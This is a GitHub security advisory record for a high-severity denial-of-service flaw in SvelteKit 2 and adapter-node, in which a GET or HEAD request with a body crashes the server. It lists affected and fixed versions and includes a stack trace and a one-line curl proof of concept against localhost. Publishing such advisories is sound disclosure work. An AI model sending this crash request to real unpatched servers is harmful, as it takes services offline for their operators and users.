GHSA-g5m6-hxpp-fc49

Suggest an improvement
Source
https://github.com/advisories/GHSA-g5m6-hxpp-fc49
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/01/GHSA-g5m6-hxpp-fc49/GHSA-g5m6-hxpp-fc49.json
JSON Data
https://api.osv.dev/v1/vulns/GHSA-g5m6-hxpp-fc49
Aliases
Related
Published
2024-01-24T14:22:22Z
Modified
2024-01-24T19:13:36Z
Severity
  • 7.5 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H CVSS Calculator
Summary
Sending a GET or HEAD request with a body crashes SvelteKit
Details

Summary

In SvelteKit 2 sending a GET request with a body eg {} to a SvelteKit app in preview or with adapter-node throws Request with GET/HEAD method cannot have body. and crashes the app.

node:internal/deps/undici/undici:6066
          throw new TypeError("Request with GET/HEAD method cannot have body.");
                ^

TypeError: Request with GET/HEAD method cannot have body.
    at new Request (node:internal/deps/undici/undici:6066:17)
    at getRequest (file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/node/index.js:107:9)
    at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:181:26
    at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7)
    at next (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44739:5)
    at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:172:6
    at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7)
    at next (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44739:5)
    at file:///C:/Users/admin/Desktop/reproduction/node_modules/@sveltejs/kit/src/exports/vite/preview/index.js:211:27
    at call (file:///C:/Users/admin/Desktop/reproduction/node_modules/vite/dist/node/chunks/dep-9A4-l-43.js:44795:7)

Node.js v20.11.0

TRACE requests will also cause the app to crash. Prerendered pages and SvelteKit 1 apps are not affected.

<!--

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer. -->

PoC

<!-- Complete instructions, including specific configuration details, to reproduce the vulnerability. --> First do a fresh install of SvelteKit 2 with the example app. Typescript.

  1. npm run build
  2. npm run preview
  3. Go to http://localhost:4173 (works)
  4. curl -X GET -d "{}" http://localhost:4173/bye
  5. Application crashes and http://localhost:4173 is down

Impact

<!-- What kind of vulnerability is it? Who is impacted? --> Denial of Service for apps using adapter-node

Database specific
{
    "github_reviewed_at": "2024-01-24T14:22:22Z",
    "cwe_ids": [
        "CWE-20"
    ],
    "nvd_published_at": "2024-01-24T17:15:08Z",
    "severity": "HIGH",
    "github_reviewed": true
}
References

Affected packages

npm / @sveltejs/kit

Package

Name
@sveltejs/kit
View open source insights on deps.dev
Purl
pkg:npm/%40sveltejs/kit

Affected ranges

Type
SEMVER
Events
Introduced
2.0.0
Fixed
2.4.3

npm / @sveltejs/adapter-node

Package

Name
@sveltejs/adapter-node
View open source insights on deps.dev
Purl
pkg:npm/%40sveltejs/adapter-node

Affected ranges

Type
SEMVER
Events
Introduced
2.0.0
Fixed
2.1.2

npm / @sveltejs/adapter-node

Package

Name
@sveltejs/adapter-node
View open source insights on deps.dev
Purl
pkg:npm/%40sveltejs/adapter-node

Affected ranges

Type
SEMVER
Events
Introduced
3.0.0
Fixed
3.0.3

npm / @sveltejs/adapter-node

Package

Name
@sveltejs/adapter-node
View open source insights on deps.dev
Purl
pkg:npm/%40sveltejs/adapter-node

Affected ranges

Type
SEMVER
Events
Introduced
4.0.0
Fixed
4.0.1

Affected versions

4.*

4.0.0